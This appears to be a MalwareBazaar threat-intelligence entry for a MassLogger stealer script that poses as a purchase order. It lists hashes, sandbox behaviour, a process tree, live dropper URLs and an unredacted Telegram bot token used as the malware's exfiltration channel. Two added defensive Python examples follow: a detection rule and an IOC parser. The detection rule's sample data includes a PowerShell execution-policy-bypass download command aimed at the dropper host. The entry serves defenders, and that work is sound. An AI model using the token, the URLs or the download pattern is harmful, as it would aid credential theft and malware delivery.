MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d6c9e6e01fcd604d1e539bb7576a630779be6422923fc0b47a5e20fbc75af2dd. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

MassLogger
Vendor detections: 10

SHA256 hash: d6c9e6e01fcd604d1e539bb7576a630779be6422923fc0b47a5e20fbc75af2dd
SHA3-384 hash: c0afdb03876b36f47a7b3181af4be59110213ddc5cb0daf8634f997fe42b30b4dcb6a0b01924aa670310f81dc1d166b8
SHA1 hash: b0c8baae8325a1a48f5de99ee366aee266b1b2e0
MD5 hash: 41d896eae343a9e3cdef7306622cd8d5
humanhash: undress-east-hamper-fourteen
File name: Purchase Order-PO25108342.vbs
Signature: MassLogger
File size: 2'129 bytes
First seen: 2025-05-27 14:58:51 UTC
Last seen: Never
File type: Visual Basic Script (vbs)
MIME type: text/plain
ssdeep: 24:5jH8bJzpEkbZiorkib1Io+Mda0237ap0PhAombCeBMzueWEztuUFZgawLiDYbzO/:W7EFQpqYOZmbCG6Rzk5BvWAxk9HwYL
Threatray: 1'095 similar samples on MalwareBazaar
TLSH: T1304153676C40D2708B62CA04935A6E58E19EF43F537085183D1CC5CE3A7DAF8A9782FB
Magika: vba
Reporter: abuse_ch
Tags: MassLogger vbs

Intelligence


File Origin
# of uploads: 1
# of downloads: 81
Origin country: NL
Vendor Threat Intelligence
Verdict: Malicious
Score: 99.9%
Tags: dropper shell sage
Result
Threat name: MSIL Logger, MassLogger RAT
Detection: malicious
Classification: troj.spyw.expl.evad
Score: 100 / 100
Signature
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Contains functionality to log keystrokes (.Net Source)
Found malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential evasive VBS script found (sleep loop)
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Powershell uses Background Intelligent Transfer Service (BITS)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Register Wscript In Run Key
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
System process connects to network (likely due to code injection or exploit)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
VBScript performs obfuscated calls to suspicious functions
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected MalBat
Yara detected MassLogger RAT
Yara detected MSIL Logger
Yara detected Telegram RAT
Behaviour
Behavior Graph ID: 1699920
Sample: Purchase Order-PO25108342.vbs
Start date: 27/05/2025
Architecture: WINDOWS
Score: 100

Process tree (flattened from the rendered graph; remote ports are given where the graph lists them, the other port numbers shown were local ephemeral ports):

wscript.exe  [Purchase Order-PO25108342.vbs]
  - connects to fancy-seehorse.netlify.app (54.215.62.21, port 443, AMAZON-02, United States)
  - drops C:\Users\user\AppData\...\app_update.txt (DOS)
  - signatures: System process connects to network (likely due to code injection or exploit); VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); 3 other signatures
  -> cmd.exe
       - signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly)
       -> wscript.exe
            -> powershell.exe
                 - signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                 -> AddInProcess32.exe
                      - connects to checkip.dyndns.com (193.122.6.168, ORACLE-BMC-31898, United States)
                      - connects to reallyfreegeoip.org (104.21.16.1, port 443, CLOUDFLARENET, United States)
                      - signature: Tries to steal Mail credentials (via file / registry access)
                 -> conhost.exe
                 -> taskkill.exe
                 -> conhost.exe
       -> powershell.exe
            - signatures: Powershell uses Background Intelligent Transfer Service (BITS); Loading BitLocker PowerShell Module
       -> powershell.exe
       -> 5 other processes
            - drop C:\Users\user\AppData\...\s-nvs_update.vbs (ASCII)
            - drop C:\Users\user\AppData\...\nvs_update.txt (Unicode)

wscript.exe
  -> powershell.exe
       - signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
       -> AddInProcess32.exe
            - signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
       -> 3 other processes

wscript.exe
  -> powershell.exe
       -> AddInProcess32.exe
            - connects to mail.gtit.pl (89.174.231.105, port 587, INTERSATPL, Poland)
       -> conhost.exe
       -> 2 other processes

Network contacts at sample level: reallyfreegeoip.org (used to detect the country of the analysis system by its IP), mail.gtit.pl, and 3 other IPs or domains.
Sample-level signatures on the graph: Sigma detected: Register Wscript In Run Key; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures.
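The execution chain above (wscript.exe spawning PowerShell directly or through cmd.exe, a web download from the netlify.app dropper host, an execution-policy bypass, and a Run-key entry that re-launches wscript.exe) maps onto the Sigma rules listed in the signature block. The following is an added example, not MalwareBazaar or sandbox code, of those checks implemented over Sysmon-like process-creation and registry events. The Event schema, the PIDs, the persistence value name and path, and the sample command lines are constructed to mirror the graph and are not captured telemetry.

```python
"""Added example (not MalwareBazaar or sandbox code): Sigma-style checks for the
MassLogger VBS execution chain, run over constructed Sysmon-like process and
registry events. The Event schema and the sample events are assumptions
modelled on the behaviour graph; they are not captured telemetry."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str               # "process" (creation) or "registry" (value set); assumed schema
    pid: int = 0
    ppid: int = 0
    image: str = ""
    parent_image: str = ""
    cmdline: str = ""
    target: str = ""        # registry key path for "registry" events
    details: str = ""       # registry value data for "registry" events


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
WEB_DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|start-bitstransfer", re.I)
EP_BYPASS = re.compile(r"-(ep|ex|exec|executionpolicy)\s+bypass", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, pid) tuples, one per rule match."""
    procs = {e.pid: e for e in events if e.kind == "process"}
    hits = []
    for e in events:
        if e.kind == "process":
            img, parent = basename(e.image), basename(e.parent_image)
            if img == "powershell.exe":
                # WScript or CScript starting PowerShell directly ...
                if parent in SCRIPT_HOSTS:
                    hits.append(("wscript_starts_powershell", e.pid))
                # ... or via cmd.exe: walk one more level up the process tree
                elif parent == "cmd.exe" and e.ppid in procs:
                    gp = procs.get(procs[e.ppid].ppid)
                    if gp and basename(gp.image) in SCRIPT_HOSTS:
                        hits.append(("wscript_starts_powershell_via_cmd", e.pid))
                if WEB_DOWNLOAD.search(e.cmdline):
                    hits.append(("suspicious_invoke_webrequest", e.pid))
                if EP_BYPASS.search(e.cmdline):
                    hits.append(("execution_policy_bypass", e.pid))
        elif e.kind == "registry":
            # Run-key persistence whose value data launches wscript or a .vbs file
            if RUN_KEY.search(e.target) and re.search(r"wscript|\.vbs\b", e.details, re.I):
                hits.append(("register_wscript_in_run_key", e.pid))
    return hits


# Constructed events (not real telemetry); PIDs, paths and the Run value are illustrative.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event("process", pid=100, ppid=1, image=r"C:\Windows\explorer.exe"),
    Event("process", pid=200, ppid=100, image=r"C:\Windows\System32\wscript.exe",
          parent_image=r"C:\Windows\explorer.exe",
          cmdline=r'wscript.exe "C:\Users\user\Downloads\Purchase Order-PO25108342.vbs"'),
    Event("process", pid=300, ppid=200, image=r"C:\Windows\System32\cmd.exe",
          parent_image=r"C:\Windows\System32\wscript.exe",
          cmdline="cmd.exe /c start /min powershell.exe"),
    Event("process", pid=400, ppid=300, image=PS, parent_image=r"C:\Windows\System32\cmd.exe",
          cmdline='powershell.exe -ep bypass -c "Invoke-WebRequest -Uri '
                  'https://fancy-seehorse.netlify.app/code/first.txt"'),
    Event("registry", pid=200,
          target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater",
          details=r"wscript.exe C:\Users\user\AppData\Roaming\updater.vbs"),
    Event("process", pid=500, ppid=1, image=r"C:\Windows\System32\svchost.exe",
          parent_image=r"C:\Windows\System32\services.exe", cmdline="svchost.exe -k netsvcs"),
]

# A benign PowerShell launch from Explorer, for a negative check.
BENIGN_EVENTS = [
    Event("process", pid=600, ppid=100, image=PS, parent_image=r"C:\Windows\explorer.exe",
          cmdline="powershell.exe -NoProfile -Command Get-Process"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:<36} pid={pid}")
```

The grandparent walk matters for this family: the graph shows PowerShell under cmd.exe under wscript.exe, which a parent-only rule for "script host starts PowerShell" would miss. The Run-key check keys on value data rather than the value name, because the name (nvs_update here) is trivially changed between builds.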
Threat name: Win32.Trojan.Generic
Status: Suspicious
First seen: 2025-05-27 13:10:49 UTC
File Type: Text (VBS)
AV detection: 7 of 24 (29.17%)
Threat level: 5/5
Result
Malware family: masslogger
Score: 10/10
Tags: family:masslogger execution spyware stealer
Behaviour
Kills process with taskkill
Script User-Agent
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Looks up external IP address via web service
MassLogger
Masslogger family
Malware Config
C2 Extraction:
https://api.telegram.org/bot7905958978:AAEng8Wyhv-U1eyp4jKpvi8uIC2em6irGnw/sendMessage?chat_id=7629239186
Dropper Extraction:
https://fancy-seehorse.netlify.app/code/final.txt
https://fancy-seehorse.netlify.app/code/first.txt
https://officedesk22.netlify.app/code/encodad.txt
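The extracted configuration gives two kinds of indicator: a Telegram Bot API exfiltration URL, whose actionable parts are the bot token and chat_id rather than the api.telegram.org host, and the netlify.app dropper URLs, whose hostnames can go straight to a blocklist. The following is an added example, not MalwareBazaar code, that parses the URLs listed above into that form and redacts the bot secret so the entry can be shared without handing the credential around. The redaction format and the IOC dictionary layout are assumptions.

```python
"""Added example (not MalwareBazaar code): turn the extracted MassLogger
configuration into handling-safe IOCs. Parses the Telegram Bot API C2 URL
into bot id, secret and chat_id, redacts the secret for sharing, and collects
dropper hostnames for blocking. URLs are the ones listed in this entry; the
redaction format and the IOC layout are assumptions."""
import re
from urllib.parse import parse_qs, urlsplit

C2_URLS = [
    "https://api.telegram.org/bot7905958978:AAEng8Wyhv-U1eyp4jKpvi8uIC2em6irGnw/sendMessage?chat_id=7629239186",
]
DROPPER_URLS = [
    "https://fancy-seehorse.netlify.app/code/final.txt",
    "https://fancy-seehorse.netlify.app/code/first.txt",
    "https://officedesk22.netlify.app/code/encodad.txt",
]

# Bot API path layout: /bot<bot_id>:<secret>/<method>
TG_BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)$")


def parse_telegram_c2(url: str):
    """Return bot_id, token, method and chat_id for a Telegram Bot API URL, else None."""
    u = urlsplit(url)
    if u.hostname != "api.telegram.org":
        return None
    m = TG_BOT_PATH.match(u.path)
    if not m:
        return None
    chat_id = parse_qs(u.query).get("chat_id", [None])[0]
    return {
        "bot_id": m["bot_id"],
        "token": f"{m['bot_id']}:{m['secret']}",
        "method": m["method"],
        "chat_id": chat_id,
    }


def redact_token(token: str, keep: int = 4) -> str:
    """Keep the bot id and the first `keep` secret characters so analysts can
    correlate across samples without circulating a usable credential."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:keep]}{'*' * (len(secret) - keep)}"


def extract_iocs(c2_urls, dropper_urls):
    """Split config URLs into blockable domains/URLs and Telegram bot details.

    api.telegram.org is deliberately kept out of the domain list: blocking it
    breaks legitimate use, and the bot token plus chat_id are the real IOCs.
    """
    iocs = {"domains": set(), "urls": set(), "telegram_bots": []}
    for url in dropper_urls:
        iocs["urls"].add(url)
        iocs["domains"].add(urlsplit(url).hostname)
    for url in c2_urls:
        info = parse_telegram_c2(url)
        if info:
            info["token_redacted"] = redact_token(info["token"])
            iocs["telegram_bots"].append(info)
        else:
            # Non-Telegram C2 is treated like a dropper URL
            iocs["urls"].add(url)
            iocs["domains"].add(urlsplit(url).hostname)
    return iocs


if __name__ == "__main__":
    result = extract_iocs(C2_URLS, DROPPER_URLS)
    for domain in sorted(result["domains"]):
        print("domain:", domain)
    for bot in result["telegram_bots"]:
        print("telegram bot:", bot["token_redacted"],
              "chat_id:", bot["chat_id"], "method:", bot["method"])
```

Detection on the wire should key on the `/bot<id>:` path prefix and the chat_id in TLS-inspected or proxy logs, not on the domain alone; the same consideration applies to the netlify.app hosts, where the full hostname (not netlify.app itself) is the indicator.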
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments